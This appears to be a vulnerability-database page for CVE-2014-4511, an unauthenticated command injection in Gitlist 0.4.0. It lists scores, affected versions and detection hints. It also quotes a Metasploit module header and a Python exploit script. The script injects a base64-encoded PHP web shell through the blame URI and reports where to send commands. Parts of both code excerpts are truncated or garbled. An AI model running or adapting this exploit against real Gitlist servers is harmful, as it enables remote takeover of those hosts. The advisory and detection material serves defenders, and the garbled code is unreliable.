CVE-2014-4511
published 2014-07-22CVE-2014-4511: Gitlist before 0.5.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the file name in the URI of a request for a (1) blame…
PriorityP275high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
82.73%
99.6th percentile
Gitlist before 0.5.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the file name in the URI of a request for a (1) blame, (2) file, or (3) stats page, as demonstrated by requests to blame/master/, master/, and stats/master/.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gitlist | gitlist | <= 0.4.0 | — |
| gitlist | gitlist | — | — |
| gitlist | gitlist | — | — |
| gitlist | gitlist | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- ·The exploit requires no authentication; there are no credentials or session tokens to filter on — detection must rely entirely on URI pattern matching. ↗
- ·The payload space is limited to 8192 bytes (max GET request length) and bad characters include '&' and space (0x20), so payloads use ${IFS} as a space substitute — detection should account for this evasion. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Gitlist - Remote Command Execution (Metasploit)
exploitdb·2014-07-07
CVE-2014-4511 Gitlist - Remote Command Execution (Metasploit)
Gitlist - Remote Command Execution (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Gitlist Unauthenticated Remote Command Execution',
'Description' => %q{
This module exploits an unauthenticated remote command execution vulnerability
in version 0.4.0 of Gitlist. The problem exists in the handling of an specially
crafted file name when trying to blame it.
},
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Author' =>
[
'drone', #discovery/poc by @dronesec
'Brandon Perry ' #Metasploit module
],
'References' =>
[
['CVE', '2014-4511'],
['EDB', '33929'],
['URL', 'http://hatriot.github.io/blog/2014/06/29/gitl
Exploit-DB
Gitlist 0.4.0 - Remote Code Execution
exploitdb·2014-06-30·CVSS 7.5
CVE-2014-5023 [HIGH] Gitlist 0.4.0 - Remote Code Execution
Gitlist 0.4.0 - Remote Code Execution
---
from commands import getoutput
import urllib
import sys
"""
Exploit Title: Gitlist 2:
path = sys.argv[2]
print '[!] Using cache location %s' % path
# payload
payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo="
# sploit; python requests does not like this URL, hence wget is used
mpath = '/blame/master/""`echo {0}|base64 -d > {1}/x.php`'.format(payload, path)
mpath = url+ urllib.quote(mpath)
out = getoutput("wget %s" % mpath)
if '500' in out:
print '[!] Shell dropped; go hit %s/cache/x.php?cmd=ls' % url.rsplit('/', 1)[0]
else:
print '[-] Failed to drop'
print out
Metasploit
Gitlist Unauthenticated Remote Command Execution
metasploit
Gitlist Unauthenticated Remote Command Execution
Gitlist Unauthenticated Remote Command Execution
This module exploits an unauthenticated remote command execution vulnerability in version 0.4.0 of Gitlist. The problem exists in the handling of a specially crafted file name when trying to blame it.
No writeups or analysis indexed.
http://hatriot.github.io/blog/2014/06/29/gitlist-rce/http://packetstormsecurity.com/files/127281/Gitlist-0.4.0-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/127364/Gitlist-Unauthenticated-Remote-Command-Execution.htmlhttp://www.exploit-db.com/exploits/33929http://www.exploit-db.com/exploits/33990https://groups.google.com/forum/#%21topic/gitlist/Hw_KdZfA4jshttp://hatriot.github.io/blog/2014/06/29/gitlist-rce/http://packetstormsecurity.com/files/127281/Gitlist-0.4.0-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/127364/Gitlist-Unauthenticated-Remote-Command-Execution.htmlhttp://www.exploit-db.com/exploits/33929http://www.exploit-db.com/exploits/33990https://groups.google.com/forum/#%21topic/gitlist/Hw_KdZfA4js
2014-07-22
Published